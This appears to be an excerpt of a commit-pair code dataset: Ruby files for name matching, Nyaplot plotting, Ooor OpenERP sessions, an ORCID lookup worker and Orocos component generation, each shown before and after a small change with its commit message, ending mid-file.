CombinedText stringlengths 4 3.42M |
|---|
class NameMatcher
SUFFIXES = %w(i ii iii iv v vi vii jr sr)
def initialize(first_name, last_name)
@first_name = first_name.strip.downcase
@last_name = last_name.strip.downcase
@full_name = @first_name + @last_name
@normalized_full_name = normalize(@full_name)
end
def match(test_first_name, test_last_name)
test_full_name = (test_first_name + test_last_name).downcase
normalized_test_full_name = normalize(test_full_name)
return true if @normalized_full_name.eql? normalized_test_full_name # names are same
diff = nil
# test if difference between two name is a SUFFIX
if(@normalized_full_name.length > normalized_test_full_name.length)
#diff = (@normalized_full_name.split('') - normalized_test_full_name.split('')).join('')
#puts "1 #{@normalized_full_name} #{normalized_test_full_name}"
diff = @normalized_full_name.gsub(normalized_test_full_name,'')
else
#diff = (normalized_test_full_name.split('') - @normalized_full_name.split('')).join('')
#puts "2 #{@normalized_full_name} #{normalized_test_full_name}"
diff = normalized_test_full_name.gsub(@normalized_full_name, '')
end
#puts "#{diff.to_s} diff is blank? #{diff.blank?}"
SUFFIXES.include?(diff) || diff.blank?
end
private
def normalize(name)
name.gsub(/[^a-z]/i, '')
end
end
removed new line
class NameMatcher
SUFFIXES = %w(i ii iii iv v vi vii jr sr)
def initialize(first_name, last_name)
@first_name = first_name.strip.downcase
@last_name = last_name.strip.downcase
@full_name = @first_name + @last_name
@normalized_full_name = normalize(@full_name)
end
def match(test_first_name, test_last_name)
test_full_name = (test_first_name + test_last_name).downcase
normalized_test_full_name = normalize(test_full_name)
return true if @normalized_full_name.eql? normalized_test_full_name # names are same
diff = nil
# test if difference between two name is a SUFFIX
if(@normalized_full_name.length > normalized_test_full_name.length)
#diff = (@normalized_full_name.split('') - normalized_test_full_name.split('')).join('')
#puts "1 #{@normalized_full_name} #{normalized_test_full_name}"
diff = @normalized_full_name.gsub(normalized_test_full_name,'')
else
#diff = (normalized_test_full_name.split('') - @normalized_full_name.split('')).join('')
#puts "2 #{@normalized_full_name} #{normalized_test_full_name}"
diff = normalized_test_full_name.gsub(@normalized_full_name, '')
end
#puts "#{diff.to_s} diff is blank? #{diff.blank?}"
SUFFIXES.include?(diff) || diff.blank?
end
private
def normalize(name)
name.gsub(/[^a-z]/i, '')
end
end |
module Nyaplot
# Jsonizable Object to which diagrams are registered
# Properties of Nyaplot::Plot are embeded into the JSON object as a part of property 'panes' by Nyaplot::Frame
class Plot
include Jsonizable
# @!attribute width
# @return [Numeric] the width
# @!attribute height
# @return [Numeric] the height
# @!attribute margin
# @return [Hash] the margin
# @!attribute xrange
# @return [Array<Numeric>, Array<String>, Array<Symbol>] the name of width set
# @!attribute yrange
# @return [Array<Numeric>, Array<String>, Array<Symbol>] the name of width set
# @!attribute x_label
# @return [String] the name of label placed along x-axis
# @!attribute y_label
# @return [String] the name of label placed along y-axis
# @!attribute bg_color
# @return [String] the code of color which background is filled in
# @!attribute grid_color
# @return [String] the code of color which grid lines are filled in
# @!attribute legend
# @return [Boolean] whether to show legend or not
# @!attribute legend_width
# @return [Numeric] the width of legend area
# @!attribute legend_options
# @return [Hash] the name of width set
# @!attribute zoom
# @return [Boolean] whether to enable zooming
# @!attribute rotate_x_label
# @return [Numeric] the angle to rotate x label (radian)
# @!attribute rotate_y_label
# @return [Numeric] the angle to rotate y label (radian)
define_properties(:diagrams, :filter)
define_group_properties(:options, [:width, :height, :margin, :xrange, :yrange, :x_label, :y_label, :bg_color, :grid_color, :legend, :legend_width, :legend_options, :zoom, :rotate_x_label, :rotate_y_label])
def initialize(&block)
init_properties
set_property(:diagrams, [])
set_property(:options, {})
set_property(:width, nil)
set_property(:legend, nil)
self.instance_eval(&block) if block_given?
end
# Add diagram with Array
# @param [Symbol] type the type of diagram to add
# @param [Array<Array>] *data array from which diagram is created
# @example
# plot.add(:scatter, [0,1,2], [0,1,2])
def add(type, *data)
labels = data.map.with_index{|d, i| 'data' + i.to_s}
raw_data = data.each.with_index.reduce({}){|memo, (d, i)| memo[labels[i]]=d; next memo}
df = DataFrame.new(raw_data)
return add_with_df(df, type, *labels)
end
# Add diagram with DataFrame
# @param [DataFrame] DataFrame from which diagram is created
# @param [Symbol] type the type of diagram to add
# @param [Array<Symbol>] *labels column labels for x, y or some other dimension
# @example
# df = Nyaplot::DataFrame.new({x: [0,1,2], y: [0,1,2]})
# plot.add(df, :scatter, :x, :y)
def add_with_df(df, type, *labels)
diagram = Diagram.new(df, type, labels)
diagrams = get_property(:diagrams)
diagrams.push(diagram)
return diagram
end
# Show plot automatically on IRuby notebook
def to_iruby
Frame.new.tap {|f| f.add(self) }.to_iruby
end
# Show plot on IRuby notebook
def show
Frame.new.tap {|f| f.add(self) }.show
end
# export html file
def export_html(path=nil)
require 'securerandom'
path = "./plot-" + SecureRandom.uuid().to_s + ".html" if path.nil?
Frame.new.tap {|f| f.add(self) }.export_html(path)
end
# @return [Array<String>] names of dataframe used by diagrams belog to this plot
def df_list
arr=[]
diagrams = get_property(:diagrams)
diagrams.each{|d| arr.push(d.df_name)}
return arr
end
def before_to_json
diagrams = get_property(:diagrams)
return if diagrams.length == 0
# set default values when not specified by users
zoom(true) if diagrams.all?{|d| d.zoom?}
if width.nil?
if legend == true
width(800)
else
width(700)
end
end
[:xrange, :yrange].each do |symbol|
if get_property(:options)[symbol].nil?
range = []
diagrams.each{|diagram| range.push(diagram.send(symbol))}
if range.all? {|r| r.length == 2} # continuous data
range = range.transpose
range = [range[0].min, range[1].max]
self.send(symbol, range)
else # discrete data
range.flatten!.uniq!
self.send(symbol, range)
end
end
end
end
# Shortcut method to configure plot
# @example
# plot = Nyaplot::Plot.new
# plot.configure do
# width(700)
# height(700)
# end
def configure(&block)
self.instance_eval(&block) if block_given?
end
end
end
Fix a bug on zooming and solve #26
module Nyaplot
# Jsonizable Object to which diagrams are registered
# Properties of Nyaplot::Plot are embeded into the JSON object as a part of property 'panes' by Nyaplot::Frame
class Plot
include Jsonizable
# @!attribute width
# @return [Numeric] the width
# @!attribute height
# @return [Numeric] the height
# @!attribute margin
# @return [Hash] the margin
# @!attribute xrange
# @return [Array<Numeric>, Array<String>, Array<Symbol>] the name of width set
# @!attribute yrange
# @return [Array<Numeric>, Array<String>, Array<Symbol>] the name of width set
# @!attribute x_label
# @return [String] the name of label placed along x-axis
# @!attribute y_label
# @return [String] the name of label placed along y-axis
# @!attribute bg_color
# @return [String] the code of color which background is filled in
# @!attribute grid_color
# @return [String] the code of color which grid lines are filled in
# @!attribute legend
# @return [Boolean] whether to show legend or not
# @!attribute legend_width
# @return [Numeric] the width of legend area
# @!attribute legend_options
# @return [Hash] the name of width set
# @!attribute zoom
# @return [Boolean] whether to enable zooming
# @!attribute rotate_x_label
# @return [Numeric] the angle to rotate x label (radian)
# @!attribute rotate_y_label
# @return [Numeric] the angle to rotate y label (radian)
define_properties(:diagrams, :filter)
define_group_properties(:options, [:width, :height, :margin, :xrange, :yrange, :x_label, :y_label, :bg_color, :grid_color, :legend, :legend_width, :legend_options, :zoom, :rotate_x_label, :rotate_y_label])
def initialize(&block)
init_properties
set_property(:diagrams, [])
set_property(:options, {})
set_property(:width, nil)
set_property(:legend, nil)
set_property(:zoom, nil)
self.instance_eval(&block) if block_given?
end
# Add diagram with Array
# @param [Symbol] type the type of diagram to add
# @param [Array<Array>] *data array from which diagram is created
# @example
# plot.add(:scatter, [0,1,2], [0,1,2])
def add(type, *data)
labels = data.map.with_index{|d, i| 'data' + i.to_s}
raw_data = data.each.with_index.reduce({}){|memo, (d, i)| memo[labels[i]]=d; next memo}
df = DataFrame.new(raw_data)
return add_with_df(df, type, *labels)
end
# Add diagram with DataFrame
# @param [DataFrame] DataFrame from which diagram is created
# @param [Symbol] type the type of diagram to add
# @param [Array<Symbol>] *labels column labels for x, y or some other dimension
# @example
# df = Nyaplot::DataFrame.new({x: [0,1,2], y: [0,1,2]})
# plot.add(df, :scatter, :x, :y)
def add_with_df(df, type, *labels)
diagram = Diagram.new(df, type, labels)
diagrams = get_property(:diagrams)
diagrams.push(diagram)
return diagram
end
# Show plot automatically on IRuby notebook
def to_iruby
Frame.new.tap {|f| f.add(self) }.to_iruby
end
# Show plot on IRuby notebook
def show
Frame.new.tap {|f| f.add(self) }.show
end
# export html file
def export_html(path=nil)
require 'securerandom'
path = "./plot-" + SecureRandom.uuid().to_s + ".html" if path.nil?
Frame.new.tap {|f| f.add(self) }.export_html(path)
end
# @return [Array<String>] names of dataframe used by diagrams belog to this plot
def df_list
arr=[]
diagrams = get_property(:diagrams)
diagrams.each{|d| arr.push(d.df_name)}
return arr
end
def before_to_json
diagrams = get_property(:diagrams)
return if diagrams.length == 0
# set default values when not specified by users
zoom(true) if zoom.nil? && diagrams.all?{|d| d.zoom?}
if width.nil?
if legend == true
width(800)
else
width(700)
end
end
[:xrange, :yrange].each do |symbol|
if get_property(:options)[symbol].nil?
range = []
diagrams.each{|diagram| range.push(diagram.send(symbol))}
if range.all? {|r| r.length == 2} # continuous data
range = range.transpose
range = [range[0].min, range[1].max]
self.send(symbol, range)
else # discrete data
range.flatten!.uniq!
self.send(symbol, range)
end
end
end
end
# Shortcut method to configure plot
# @example
# plot = Nyaplot::Plot.new
# plot.configure do
# width(700)
# height(700)
# end
def configure(&block)
self.instance_eval(&block) if block_given?
end
end
end
|
module Nydp
VERSION = "0.2.4"
end
version: bump to 0.2.5
module Nydp
VERSION = "0.2.5"
end
|
module Nydp
VERSION = "0.1.7.1"
end
version: bump to 0.1.8
module Nydp
VERSION = "0.1.8"
end
|
module NYNY
VERSION = "1.0.1"
end
Bump version
module NYNY
VERSION = "1.1.0"
end
|
require 'ooor/services'
module Ooor
class Session < SimpleDelegator
include Transport
attr_accessor :web_session, :connection, :id
def common(); @common_service ||= CommonService.new(self); end
def db(); @db_service ||= DbService.new(self); end
def object(); @object_service ||= ObjectService.new(self); end
def report(); @report_service ||= ReportService.new(self); end
def initialize(connection, web_session, id)
super(connection)
@connection = connection
@web_session = web_session || {}
@id = id || web_session[:session_id]
end
def [](key)
@session[key]
end
def []=(key, value)
@session[key] = value
end
def global_login(options)
config.merge!(options)
load_models(config[:models], options[:reload])
end
def const_get(model_key, lang=nil);
if config[:aliases]
if lang && alias_data = config[:aliases][lang]
openerp_model = alias_data[model_key] || model_key
elsif alias_data = config[:aliases][connection_session['lang'] || :en_US]
openerp_model = alias_data[model_key] || model_key
else
openerp_model = model_key
end
else
openerp_model = model_key
end
define_openerp_model(model: openerp_model, scope_prefix: config[:scope_prefix])
end
def[](model_key) #TODO invert: define method here and use []
const_get(model_key)
end
def load_models(model_names=config[:models], reload=config[:reload])
helper_paths.each do |dir|
Dir[dir].each { |file| require file }
end
domain = model_names ? [['model', 'in', model_names]] : []
search_domain = domain - [1]
model_ids = object.object_service(:execute, "ir.model", :search, search_domain, 0, false, false, {}, false, {:context_index=>4})
models_records = object.object_service(:execute, "ir.model", :read, model_ids, ['model', 'name']) #TODO use search_read
models_records.each do |opts|
options = HashWithIndifferentAccess.new(opts.merge(scope_prefix: config[:scope_prefix], reload: reload))
define_openerp_model(options)
end
end
def set_model_template!(klass, options)
templates = Ooor.model_registry_handler.models(config)
if template = templates[options[:model]] #using a template avoids to reload the fields
klass.t = template
else
template = Ooor::ModelTemplate.new
template.openerp_model = options[:model]
template.openerp_id = options[:id]
template.description = options[:name]
template.state = options[:state]
template.many2one_associations = {}
template.one2many_associations = {}
template.many2many_associations = {}
template.polymorphic_m2o_associations = {}
template.associations_keys = []
klass.t = template
templates[options[:model]] = template
end
end
def define_openerp_model(options) #TODO param to tell if we define constants or not
scope_prefix = options[:scope_prefix]
scope = scope_prefix ? Object.const_get(scope_prefix) : Object
model_class_name = class_name_from_model_key(options[:model])
if !models[options[:model]] || options[:reload] || !scope.const_defined?(model_class_name)
logger.debug "registering #{model_class_name}"
klass = Class.new(Base)
set_model_template!(klass, options)
klass.name = model_class_name
klass.scope_prefix = scope_prefix
klass.connection = self
if options[:reload] || !scope.const_defined?(model_class_name)
scope.const_set(model_class_name, klass)
end
(Ooor.extensions[options[:model]] || []).each do |block|
klass.class_eval(&block)
end
models[options[:model]] = klass
end
models[options[:model]]
end
def models; @models ||= {}; end
def logger; Ooor.logger; end
end
end
model constant generation is now optional
require 'ooor/services'
module Ooor
class Session < SimpleDelegator
include Transport
attr_accessor :web_session, :connection, :id
def common(); @common_service ||= CommonService.new(self); end
def db(); @db_service ||= DbService.new(self); end
def object(); @object_service ||= ObjectService.new(self); end
def report(); @report_service ||= ReportService.new(self); end
def initialize(connection, web_session, id)
super(connection)
@connection = connection
@web_session = web_session || {}
@id = id || web_session[:session_id]
end
def [](key)
@session[key]
end
def []=(key, value)
@session[key] = value
end
def global_login(options)
config.merge!(options)
load_models(config[:models], options[:reload])
end
def const_get(model_key, lang=nil);
if config[:aliases]
if lang && alias_data = config[:aliases][lang]
openerp_model = alias_data[model_key] || model_key
elsif alias_data = config[:aliases][connection_session['lang'] || :en_US]
openerp_model = alias_data[model_key] || model_key
else
openerp_model = model_key
end
else
openerp_model = model_key
end
define_openerp_model(model: openerp_model, scope_prefix: config[:scope_prefix], generate_constants: config[:generate_constants])
end
def[](model_key) #TODO invert: define method here and use []
const_get(model_key)
end
def load_models(model_names=config[:models], reload=config[:reload])
helper_paths.each do |dir|
Dir[dir].each { |file| require file }
end
domain = model_names ? [['model', 'in', model_names]] : []
search_domain = domain - [1]
model_ids = object.object_service(:execute, "ir.model", :search, search_domain, 0, false, false, {}, false, {:context_index=>4})
models_records = object.object_service(:execute, "ir.model", :read, model_ids, ['model', 'name']) #TODO use search_read
models_records.each do |opts|
options = HashWithIndifferentAccess.new(opts.merge(scope_prefix: config[:scope_prefix], reload: reload, generate_constants: config[:generate_constants]))
define_openerp_model(options)
end
end
def set_model_template!(klass, options)
templates = Ooor.model_registry_handler.models(config)
if template = templates[options[:model]] #using a template avoids to reload the fields
klass.t = template
else
template = Ooor::ModelTemplate.new
template.openerp_model = options[:model]
template.openerp_id = options[:id]
template.description = options[:name]
template.state = options[:state]
template.many2one_associations = {}
template.one2many_associations = {}
template.many2many_associations = {}
template.polymorphic_m2o_associations = {}
template.associations_keys = []
klass.t = template
templates[options[:model]] = template
end
end
def define_openerp_model(options) #TODO param to tell if we define constants or not
if !models[options[:model]] || options[:reload]# || !scope.const_defined?(model_class_name)
scope_prefix = options[:scope_prefix]
scope = scope_prefix ? Object.const_get(scope_prefix) : Object
model_class_name = class_name_from_model_key(options[:model])
logger.debug "registering #{model_class_name}"
klass = Class.new(Base)
set_model_template!(klass, options)
klass.name = model_class_name
klass.scope_prefix = scope_prefix
klass.connection = self
if options[:generate_constants] && (options[:reload] || !scope.const_defined?(model_class_name))
scope.const_set(model_class_name, klass)
end
(Ooor.extensions[options[:model]] || []).each do |block|
klass.class_eval(&block)
end
models[options[:model]] = klass
end
models[options[:model]]
end
def models; @models ||= {}; end
def logger; Ooor.logger; end
end
end
|
require 'open-uri'
class OrcidWorker
include Sidekiq::Worker
def perform(orcid_id)
user = User.find_by_uid(orcid_id)
name = orcid_name_for(orcid_id)
user.update_attributes(:name => name)
end
def orcid_name_for(orcid_id)
data = JSON.parse(open("http://pub.orcid.org/v1.1/#{orcid_id}/orcid-bio", "Accept" => "application/orcid+json").read)
given_name = data['orcid-profile']['orcid-bio']['personal-details']['given-names']['value']
surname = data['orcid-profile']['orcid-bio']['personal-details']['family-name']['value']
return "#{surname}, #{given_name}"
end
end
Fix ORCID worker
require 'open-uri'
class OrcidWorker
include Sidekiq::Worker
def perform(orcid_id)
user = User.find_by_uid(orcid_id)
name = orcid_name_for(orcid_id)
user.update_attributes(:name => name)
end
def orcid_name_for(orcid_id)
data = JSON.parse(open("http://pub.orcid.org/v1.1/#{orcid_id}/orcid-bio", "Accept" => "application/orcid+json").read)
given_name = data['orcid-profile']['orcid-bio']['personal-details']['given-names']['value']
if data['orcid-profile']['orcid-bio']['personal-details'].has_key?('family-name')
surname = data['orcid-profile']['orcid-bio']['personal-details']['family-name']['value']
return "#{surname}, #{given_name}"
else
return "#{given_name}"
end
end
end
|
require 'utilrb/module/attr_predicate'
require 'utilrb/value_set'
module Orocos
def self.validate_toplevel_type(type)
if type < Typelib::ArrayType
raise ArgumentError, "array types can be used only in a structure"
elsif type < Typelib::NumericType && !Typelib::Registry.base_rtt_type?(type)
raise ArgumentError, "#{type.name} cannot be used as a toplevel type"
end
end
module Generation
ACTIVITY_TYPES = {
:fd_driven => 'FileDescriptorActivity',
:irq_driven => 'IRQActivity',
:slave => 'SlaveActivity',
:periodic => 'PeriodicActivity',
:triggered => 'NonPeriodicActivity',
:sequential => 'SequentialActivity'
}
class Property
# The task on which this property is attached
attr_reader :task
# The property name
attr_reader :name
# The property type, as a Typelib::Type object from the underlying
# component's type registry
attr_reader :type
# The name of the type this property is using, for consistency with
# the +type+ attribute
def type_name; type.name end
def used_types; [type] end
# The property's default value
attr_reader :default_value
# The property default value, formatted for as a C++ value
def cxx_default_value
if type < Typelib::EnumType
type.namespace('::') + default_value.to_s
else
default_value.inspect
end
end
# Create a new property with the given name, type and default value
def initialize(task, name, type, default_value)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "property names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
@name, @type, @default_value = name, type, default_value
end
def pretty_print(pp)
pp.text "#{name}:#{type.name}"
if doc
pp.text ": #{doc}"
end
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
end
# Generic representation of ports. The actual ports are either
# instance of InputPort or OutputPort
class Port
# The port task
attr_reader :task
# The port name
attr_reader :name
# The port type
attr_reader :type
# The port type name
def type_name; type.name end
def used_types; [type] end
# True if the component supports only static connections on this
# port, and false otherwise
#
# See #static for more details.
def static?; !!@static end
# Declares that this port can be connected/disconnected only when
# the component is in a non-running state.
#
# The default is that the port is dynamic, i.e. can be
# connected/disconnected regardless of the component's state.
#
# See also #dynamic
def static; @static = true end
# Declares that this port can be connected/disconnected while the
# component is running. It is the opposite of #static.
#
# This is the default
def dynamic; @static = false end
def pretty_print(pp)
pp.text "[#{self.kind_of?(InputPort) ? "in" : "out"}]#{name}:#{type_name}"
end
def initialize(task, name, type)
if !name.kind_of?(Regexp)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "port names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
if type.name == "/std/vector<double>"
Orocos::Generation.warn "#{type.name} is used as the port type for #{name}, logging it will not be possible"
end
@task, @name, @type = task, name, type
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
end
# Specification for an output port
class OutputPort < Port
def initialize(*args)
super
@sample_size = 1
@period = 1
@burst_size = nil
@burst_period = nil
@port_triggers = Set.new
end
# Returns the name of the Orocos class for this port (i.e. one of
# ReadDataPort, WriteDataPort, DataPort, ReadBufferPort, ...)
def orocos_class; "RTT::OutputPort" end
attr_reader :burst_size
attr_reader :burst_period
# call-seq:
# sample_size new_size -> self
# sample_size -> size
#
# Sets and gets the sample size, i.e. how many data samples are
# pushed at once to this port.
dsl_attribute(:sample_size) { |value| Integer(value) }
# call-seq:
# period new_period -> self
# period -> current_period
#
# Sets the period for this output port, in cycles. The port period
# should be the minimal amount of execution cycles (calls to
# updateHook) between two updates of this port.
#
# See #sample_size and #burst for other parameters describing the
# behaviour of this port.
#
# The default is one.
dsl_attribute(:period) { |value| Integer(value) }
# call-seq:
# burst count, period -> self
#
# Declares that a burst of data can occasionally be written to this
# port. +count+ is the maximal number of samples that are pushed to
# this port at once, and +period+ how often this burst can happen.
#
# If the perid is set to 0, then it is assumed that the bursts
# happen 'every once in a while', i.e. that it can be assumed that
# the event is rare enough.
#
# The default is no burst
def burst(size, period = 1)
@burst_size = Integer(size)
@burst_period = Integer(period)
self
end
# The set of input ports that will cause a write on this output
attr_reader :port_triggers
# call-seq:
# triggered_on input_port_name, input_port_name, ...
#
# Declares that this port will be written whenever a sample is
# received on the given input ports. The default is to consider that
# the port is written whenever updateHook() is called.
#
# You may want to call #triggered_on_update if the port will be
# written for each call to updateHook too.
def triggered_on(*input_ports)
@port_triggers |= input_ports.to_set.map { |name| task.port(name) }
self
end
# call-seq:
# triggered_on_update
#
# Declares that this port will be written for each call of the
# updateHook(). It is the default if #triggered_on has not been
# called.
def triggered_on_update
@triggered_on_update = true
self
end
# True if the port will be written for the calls to updateHook()
# that are triggered by the activity.
#
# See #triggered_on_update and #triggered_on
def triggered_on_update?
if !@port_triggers.empty?
!!@triggered_on_update
else
true
end
end
end
# Specification for an input port
class InputPort < Port
# Returns the name of the Orocos class for this port (i.e. one of
# ReadDataPort, WriteDataPort, DataPort, ReadBufferPort, ...)
def orocos_class; "RTT::InputPort" end
attr_reader :required_connection_type
def initialize(*args)
super
@required_connection_type = :data
end
# True if connections to this port must use a buffered.
# In general, it means that the task's code check the return value
# of read(), as in
#
# if (_input.read(value))
# {
# // data is available, do something
# }
def needs_buffered_connection; @required_connection_type = :buffer; self end
# True if connections to this port must use a data policy.
#
# This should not be useful in general
def needs_data_connection; @required_connection_type = :data; self end
# Returns true if the component requires connections to this port to
# be reliable (i.e. non-lossy).
#
# See #needs_reliable_policy for more information
def needs_reliable_connection?; @needs_reliable_connection end
# Declares that the components requires a non-lossy policy
#
# This is different from #requires_buffered_connection as a data
# policy could be used if the period of the connection's source is
# much longer than the period of the connection's end (for
# instance).
def needs_reliable_connection; @needs_reliable_connection = true; self end
end
module DynamicPort
def instanciate(name)
m = dup
m.instance_variable_set :@name, name
m
end
def pretty_print(pp)
pp.text "[dyn,#{self.class < InputPort ? "in" : "out"}]#{name}:#{type_name}"
end
end
# Specification for a dynamic output port.
#
# Dynamic ports are not statically present, but will be created at
# runtime. They are added by TaskContext#dynamic_output_port.
class DynamicOutputPort < OutputPort
include DynamicPort
end
# Specification for a dynamic input port.
#
# Dynamic ports are not statically present, but will be created at
# runtime. They are added by TaskContext#dynamic_input_port.
class DynamicInputPort < InputPort
include DynamicPort
end
# Base class for methods and commands
class Callable
# The TaskContext instance this method is part of
attr_reader :task
# The method name
attr_reader :name
def initialize(task, name)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "#{self.class.name.downcase} names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
@task = task
@name = name
@arguments = []
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
# The set of arguments of this method, as an array of [name, type,
# doc] elements. The +type+ objects are Typelib::Type instances.
#
# See #argument
attr_reader :arguments
# Defines the next argument of this method. +name+ is the argument
# name and +type+ is either the type name as a string, or a
# Typelib::Type object. In both cases, the required type must be
# defined in the component, either because it is part of its own
# toolkit or because it has been imported by a
# Component#load_toolkit call.
#
# Note that Orocos::RTT does not support having more than 4
# arguments for a method, and trying that will therefore raise an
# error
def argument(name, type, doc = "")
if arguments.size == 4
raise ArgumentError, "Orocos does not support having more than 4 arguments for a method"
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
arguments << [name, type, doc]
self
end
# Returns the set of types that this method/command uses, as a
# ValueSet of Typelib::Type classes.
def used_types
arguments.map { |_, t, _| t }
end
# Returns the argument part of the C++ signature for this callable
def argument_signature(with_names = true)
arglist = arguments.map do |name, type, doc|
arg = type.full_name('::', true)
if !(type < Typelib::NumericType)
arg += " const &"
end
if with_names then "#{arg} #{name}"
else arg
end
end
"(" << arglist.join(", ") << ")"
end
end
# Representation of a RTT method. Instances of this object are usually
# created through TaskContext#method. The generated code will expect
# the class implementation (user-visible part) to define one method, to
# serve the call, with almost the same name that the method itself.
#
# For instance, the following definition
# method('MyMethod')
#
# will require the user-visible part to define
# [return value] myMethod([arguments]);
#
# (note that the first character of the method name has been set to
# lowercase to generate the C++ method name)
#
# The argument list of the C++ method (the first one) can be defined
# using Callable#argument. Its return type by using #returns. The
# default method signature is no return type (i.e. void) and no
# arguments.
#
# The name of the work and completion methods can be changed with
# #method_name.
#
# For instance,
# method('MyMethod').
# argument('x', 'double', 'the target X value').
# argument('y', 'double', 'the target Y value').
# method_name('move').
# returns('double')
#
# will require the user-visible part to define
# double move(double x, double y);
class Method < Callable
def initialize(task, name)
super
@method_name = self.name.dup
method_name[0, 1] = method_name[0, 1].downcase
end
def used_types # :nodoc:
[return_type].compact + super
end
# The return type of this method, as a Typelib::Type object.
# See #returns
attr_reader :return_type
# Sets the return type for this method. +type+ can either be the
# type name or a Typelib::Type object. In both cases, the required
# type must be defined in the component, either because it is part
# of its own toolkit or because it has been imported by a
# Component#load_toolkit call.
def returns(type)
if type
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
end
@return_type = type
self
end
# Returns the C++ signature for this method. Used in code
# generation only.
def signature(with_names = true)
result = ""
if return_type
result << return_type.full_name('::', true)
else
result << "void"
end
if with_names
result << " " <<
if block_given? then yield
else method_name
end
end
result << argument_signature(with_names)
end
def pretty_print(pp)
pp.text signature(true)
end
# call-seq:
# method_name new_name -> self
# method_name -> current_name
#
# Gets or sets the name of the C++ method which is to be called to
# serve this orocos method. It default to the method name with the
# first character set to lowercase (MyMethod becomes myMethod).
dsl_attribute(:method_name) { |value| value.to_s }
end
# Representation of a RTT command. Instances of this object are usually
# created through TaskContext#command. The generated code will expect
# the class implementation (user-visible part) to define two methods:
# * a _work_ method which is called once when the command is called. This
# method has a boolean return type and should return true if the command
# started, and false otherwise.
# * a _completion_ method which is called while the command is running.
# This method should return true when the command is finished and false
# otherwise.
#
# For instance, the following definition
# command('MyCommand')
#
# will require the user-visible part to define
# bool myCommand([arguments]);
# bool isMyCommandCompleted([arguments]);
#
# (note that the first character of the command name has been set to
# lowercase for the work-method name)
#
# The argument list of the work method (the first one) can be defined
# using Callable#argument. For the completion method, three choices are
# available:
# * no arguments at all
# * the same first argument that the work method
# * all the same arguments than the work method
#
# The default is to have all arguments. This can be changed using
# #completion_no_arguments, #completion_first_argument and
# #completion_all_arguments.
#
# The name of the work and completion methods can be changed with
# #work_method_name and #completion_method_name.
#
# For instance,
# command('my_command').
# argument('x', 'double', 'the target X value').
# argument('y', 'double', 'the target Y value').
# work_method_name('move').
# completion_method_name('hasReachedTarget').
# completion_no_arguments.
#
# will require the user-visible part to define
# bool move(double x, double y);
# bool hasReachedTarget();
class Command < Callable
# The C++ method name to be called to serve this Orocos command.
# This defaults to +name+, but you can customize it by using
# #method_name
dsl_attribute(:work_method_name) { |name| name.to_s }
# The C++ method name to be called to serve this Orocos command.
# This defaults to is+name+Completed, but you can customize it by
# using #method_name
dsl_attribute(:completion_method_name) { |name| name.to_s }
# Create a new callable object on the specified task and with the
# specified name. The setup of the callable should be done by
# calling the various setup methods after the object has been
# created.
def initialize(task, name)
super
@work_method_name = self.name.dup
work_method_name[0, 1] = work_method_name[0, 1].downcase
@completion_method_name = "is#{name}Completed"
@completion_signature_type = :all_arguments
end
# Which kind of signature do we want for the completion method ?
# It is either +:no_arguments+, +:first_argument+ or +:all_arguments+
# Use #completion_no_arguments, #completion_first_argument or #completion_all_arguments
# to change it
attr_reader :completion_signature_type
# The completion method for this command has no argument at all
def completion_no_arguments; @completion_signature_type = :no_arguments end
# The completion method for this command will be given the same
# first argument than the command method
def completion_first_argument; @completion_signature_type = :first_argument end
# The completion method for this command will be given the same
# arguments than the command method
def completion_all_arguments; @completion_signature_type = :all_arguments end
# A string representing the signature for the C++ work method. If
# +with_names+ is true, the name of the method and the names of the
# arguments are included in the string.
def work_signature(with_names = true)
result = "bool"
if with_names
result << " " <<
if block_given? then yield
else work_method_name
end
end
result << argument_signature(with_names)
end
# A string representing the signature for the C++ completion
# method. If +with_names+ is true, the name of the method and the
# names of the arguments are included in the string.
#
# The result depends on the completion_signature_type attribute,
# which can be changed by the completion_no_arguments,
# completion_first_argument and completion_all_arguments methods.
def completion_signature(with_names = true)
result = "bool"
if with_names
result << " " <<
if block_given? then yield
else completion_method_name
end
end
result << case completion_signature_type
when :no_arguments then "()"
when :first_argument
argument_signature(with_names).gsub(/,.*\)$/, ")")
when :all_arguments; argument_signature(with_names)
end
result
end
def pretty_print(pp) # :nodoc:
pp.text work_signature(true)
pp.breakable
pp.text completion_signature(true)
end
end
# Representation of TaskContext classes. This is usually created using
# Component#task_context.
#
# In the generated code, two classes are actually generated:
# * the auto-generated code is in <tt>.orogen/tasks/[name]Base.cpp</tt>
# and <tt>.orogen/tasks/[name]Base.hpp</tt>. These files define the
# various attributes related to the task context (i.e. port and
# attribute objects) in an <tt>[component.name]::[name]Base</tt> class.
# * the user-visible code is in <tt>tasks/[name].cpp</tt> and
# <tt>tasks/[name].hpp</tt>. These files are the ones that define the
# <tt>[component.name]::[name]</tt> class, which is a direct subclass
# of the <tt>[component.name]::[name]Base</tt> class.
#
# By default, the +Base+ class derives from the
# <tt>RTT::TaskContext</tt> class. This can be changed by using the
# #subclasses method.
#
# For all task context objects (ports, properties, ...) there is one
# attribute, of the right RTT class, added to the generated TaskContext
# subclass. The attribute name is always the _[object name], so for
# instance the presence of the following statement
# output_port('time', 'double')
#
# will cause a <tt>OutputPort<double></tt> attribute named
# <tt>_time</tt> to be added to the generated class (more specifically,
# to the +Base+ subclass).
class TaskContext
# The component this task is part of
attr_reader :component
# The task name
attr_reader :name
# The subclass of TaskContext which should be used to define this
# class
attr_reader :superclass
# A set of classes the TaskContext has to implement as well
attr_reader :implemented_classes
# A set of Port objects that can be created at runtime
attr_reader :dynamic_ports
def self.enumerate_inherited_set(each_name, attribute_name = each_name) # :nodoc:
class_eval <<-EOD
